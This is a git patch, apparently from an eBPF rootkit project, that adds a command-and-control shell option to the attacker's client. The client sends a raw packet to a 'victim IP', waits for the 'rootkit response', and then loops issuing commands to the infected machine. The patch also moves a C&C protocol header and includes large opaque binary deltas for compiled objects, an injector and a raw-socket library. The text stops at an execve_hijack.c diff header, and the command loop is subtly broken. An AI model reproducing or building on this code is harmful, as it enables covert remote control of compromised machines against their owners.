From 9a47a2b15aefbc63413e58fe814c699a1b3e2cb8 Mon Sep 17 00:00:00 2001 From: h3xduck Date: Thu, 17 Feb 2022 06:21:09 -0500 Subject: [PATCH] Completed client integration with new c&c module. --- src/client/client.c | 59 +++++++++++++++++- src/client/client.o | Bin 6952 -> 9344 bytes src/client/injector | Bin 37096 -> 37680 bytes src/client/lib/libRawTCP_Lib.a | Bin 51740 -> 51524 bytes src/{ebpf/include/packet/c&c => common}/c&c.h | 3 +- src/helpers/execve_hijack.c | 2 + src/helpers/lib/libRawTCP_Lib.a | Bin 51740 -> 51524 bytes 7 files changed, 60 insertions(+), 4 deletions(-) rename src/{ebpf/include/packet/c&c => common}/c&c.h (61%) diff --git a/src/client/client.c b/src/client/client.c index dd1da95..3186f1a 100644 --- a/src/client/client.c +++ b/src/client/client.c @@ -10,6 +10,7 @@ #include #include "../common/constants.h" +#include "../common/c&c.h" // For printing with colors #define KGRN "\x1B[32m" @@ -30,9 +31,12 @@ void print_welcome_message(){ void print_help_dialog(const char* arg){ printf("\nUsage: %s OPTION victim_IP\n\n", arg); printf("Program OPTIONs\n"); - char* line = "-S"; + char* line = "-S IP"; char* desc = "Send a secret message to IP"; printf("\t%-40s %-50s\n\n", line, desc); + line = "-c IP"; + desc = "Activate direct command & control shell with IP"; + printf("\t%-40s %-50s\n\n", line, desc); line = "-h"; desc = "Print this help"; printf("\t%-40s %-50s\n\n", line, desc); @@ -135,6 +139,46 @@ void send_secret_packet(char* argv){ free(local_ip); } +void activate_command_control_shell(char* argv){ + char* local_ip = getLocalIpAddress(); + printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); + check_ip_address_format(argv); + packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, CC_PROT_SYN); + printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n"); + //Sending the malicious payload + if(rawsocket_send(packet)<0){ + printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n"); + return; + }else{ + printf("["KGRN"OK"RESET"]""Secret message successfully sent!\n"); + } + printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n"); + + //Wait for rootkit ACK to ensure it's up + rawsocket_sniff_pattern(CC_PROT_ACK); + printf("["KGRN"OK"RESET"]""Success!\n"); + + //Received ACK, we proceed to send command + while(1){ + char buf[BUFSIZ]; + printf(""KYLW"c>:"RESET""); + scanf("%s", buf); + if(rawsocket_send(packet)<0){ + printf("["KRED"ERROR"RESET"]""An error occured. Aborting...\n"); + return; + } + char msg[BUFSIZ]; + strcpy(msg, CC_PROT_MSG); + strcat(msg, buf); + printf("Sending %s\n", msg); + packet_t packet = rawsocket_sniff_pattern(CC_PROT_MSG); + char* res = packet.payload; + printf(""KYLW"c>:"RESET" %s\n", res); + } + + free(local_ip); +} + void main(int argc, char* argv[]){ if(argc<2){ @@ -154,7 +198,7 @@ void main(int argc, char* argv[]){ char path_arg[512]; //Command line argument parsing - while ((opt = getopt(argc, argv, ":S:h")) != -1) { + while ((opt = getopt(argc, argv, ":S:c:h")) != -1) { switch (opt) { case 'S': print_welcome_message(); @@ -166,6 +210,17 @@ void main(int argc, char* argv[]){ send_secret_packet(dest_address); PARAM_MODULE_ACTIVATED = 1; + break; + case 'c': + print_welcome_message(); + sleep(1); + //Send a secret message + printf("["KBLU"INFO"RESET"]""Activated COMMAND & CONTROL shell\n"); + //printf("Option S has argument %s\n", optarg); + strcpy(dest_address, optarg); + activate_command_control_shell(dest_address); + PARAM_MODULE_ACTIVATED = 1; + break; /*case 'u': print_welcome_message(); diff --git a/src/client/client.o b/src/client/client.o index b3311a9c68ee594d9c5a4732df4eabbf8f3a194c..9abdf7c769985952c9124dd08eb4714e365ead1a 100644 GIT binary patch literal 9344 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 BzV-kB delta 1764 zcmZWpT}TvB6rMZl&&=jJJFdI4qvE=&)Z$Mn$eKc0n1N~7V)RlJih|@rD<}m8Yb8ZQ z_;d216x1m4Niz+$K+=aEj9w&zAS&A)A`r?VNV4qSnY()04%|C?zVm(GJ@@Y1>8YCt z^!vpLZ6N>0Opx3VVRur!c$dKWq=E(~5roTgtG_ol+m+ryVLR!2zm+s~`Atfb(zm#U zRw})>wvy_u?$47zBsYYUqvQ#+NQYrs3P84;3UiVThe7Gpai@o5gV&|$W%Mvv#I)%=uYe$}*2h&3@cf8TZR1%2 z)$gEVW7CYAFzwR9Q>dDXs?Xv)FYx?1;wy;1jBq=`KO$U3_%9RB-`dhFCmH}HvUc$T zR!}uf_plS7!K!I=#5Pj~n_KsYIyz~@tuhOCysxV=N4FVYa|mE=$sD&bS`FyzK6eVjK+Sx;QYNtwT@TWX=rGb zlMvK3eK=0L!L?&d+x!q|laaQ9nbBYmHex4SgK!<;hd3VVu#o#Uf|{X)kD+P?Qne#D z2g1)HJRRXf2*=%yA{@VV_e?x&yiJ+NXp#$J?VjN6Mv#$&`16R5eHIbUEPA=m%YS^r z+voQd6>z6t5RP}Yj&RJkCDPSs#5OR=7uGn=WLb0=|63Nl>XmVVSuUuCg-oq9h-7&A z;|RygpMi^68mxHsl}1??Gxiw-nvxo@M+<+XinQ0k#^UCECc9m#!!3VGBFaL7Hy8r+H diff --git a/src/client/injector b/src/client/injector index b685bffdec08b9f02aeae22ee78f2354d82ec281..eb8969abe95f44acbaae4f2f357d6c2d560fc08d 100755 GIT binary patch delta 10964 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ν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 mAld|6=@`L+5*1{IAM66|F%UqXr$#c2=?Vi6P- zTc?*`&E>yh^p^j-^kA9~KKu`X^b%3gLlE>-MEG~d4t(eEecyp|YEQ-16H$5GZ50@^ z3dn{+Z(4yxaeDj|ZZuEu_%YO*!?thfnV=kA7AGi%PsI$);rPl`{^L3}moxabVjlMF zq+7%oE8lLhzPt4U*M+Y*jYq5d^by8|IOXlVn;FSn!a(T?cTRa!*TSB&oH4-+ zIDuI-vcvY@J5`FDl>IytlKzX*_f^I&Nw2uJETtHI_s^MbJ2M?H?(wNZ z-RH|f{3O4p2f@*(Z9M4VI?j$h9POgln5=~Re|2fMMq9#q{<$6K=t`Jhme|aj8`VgF z=Oqrd65jo2+s#--Ao(sq&vjd+*;!M)4cU2pz~{*!3~WcJh-^c7=VG0E!H?2*f~Mg# z6!{Q*q4@hT)aR4EXZkvh6lT>BYC94BXAH50B;7)AUGd*0>UtSObzM;$j^-4CmLdaL eOL^b6duyaPO1lYSa4f}hM=`T_#GYt=8Tk)eGM6C$ delta 631 zcmX>yiFwWx<_UdlODq@|mRL*<6cO3Dg0GO-(#T+Pr?x)hkIgR&cQZ4#O=lr zeyJ~G_GI0%G^Ur+Chsl@nEa?r%vQ>y+jW9R=P{37TLvK50U}<2h}RN8nG4utnrl}u z@V6BF`~QD3cWE#a1HNl|8Ax*N4a zm&q!fE@HYsS2DQr3A8ae^Rjs~Gc(ID@vw6Mjgp#V<~R9QMAT-7t^`I-uri>^(~}RH ziElp8&B4O7mSys~I5EaAlOOhrOR=#6C4m5B8Z!`I0daspfOT?SyqJ^%n)EM-EQ1zU zn#qoJa$l?%W9??a3Hp4D-IE>XnR5n6L)3hj+&Isi=``4PlRwyLz?cH_HMlN7jg@Ac zoR(|G_GeT>MxS0JkK&asU7T diff --git a/src/ebpf/include/packet/c&c/c&c.h b/src/common/c&c.h similarity index 61% rename from src/ebpf/include/packet/c&c/c&c.h rename to src/common/c&c.h index 7fbec6b..b040b84 100644 --- a/src/ebpf/include/packet/c&c/c&c.h +++ b/src/common/c&c.h @@ -3,8 +3,7 @@ #define CC_PROT_SYN "CC_SYN" #define CC_PROT_ACK "CC_ACK" -#define CC_PROT_SYN_ACK "CC_SYN_ACK" -#define CC_PROT_SEPARATOR "#" +#define CC_PROT_MSG "CC_MSG#" #endif \ No newline at end of file diff --git a/src/helpers/execve_hijack.c 